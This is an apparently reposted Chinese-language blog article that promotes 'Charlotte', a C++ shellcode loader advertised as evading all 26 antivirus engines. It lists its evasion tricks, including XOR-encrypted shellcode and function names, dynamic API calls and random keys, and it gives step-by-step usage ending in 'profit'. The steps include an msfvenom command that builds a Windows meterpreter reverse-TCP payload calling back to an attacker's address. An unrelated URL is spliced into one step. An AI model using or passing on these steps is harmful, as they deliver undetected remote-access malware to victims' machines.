免杀 0/26 Charlotte C++ Shellcode 加载器

六六传世原创文章投稿奖励计划

文章来源:  Khan安全攻防实验室

免杀 0/26 Charlotte C++ Shellcode 加载器

免杀 0/26 Charlotte C++ Shellcode 加载器

2021年5月13日:

  1. c ++ shellcode启动器,截至2021年5月13日完全未检测到0/26。

  2. 动态调用win32 api函数

  3. Shellcode和函数名称的XOR加密

  4. 每次运行随机XOR键和变量

  5. 在Kali Linux上,只需“ apt-get install mingw-w64 *”就可以了!

2021年5月17日:

    1.随机字符串长度和XOR键长度

免杀 0/26 Charlotte C++ Shellcode 加载器

用法

        git克隆存储库,使用beacon.bin命名生成您的shellcode文件,然后运行charlotte.py

例子:

  1. git clone http://github.com/9emin1/charlotte.git && apt-get install mingw-w64*

  2. cd charlotte

  3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin

  4. python charlotte.py

  5. www.idc126.com

    profit

更新v1.1

2021/05/21:

显然,Microsoft Windows Defender能够检测到.DLL二进制文件,以及他们如何标记它?通过寻找几个16字节大小的XOR键将其更改为以下POC .gif中显示的9表示现在再次未被检测到。

项目地址:

http://github.com/9emin1/charlotte

本文原创,作者:张,其版权均为六六传世网所有。如需转载,请注明出处:http://66woool.com/html/280294.html

发表评论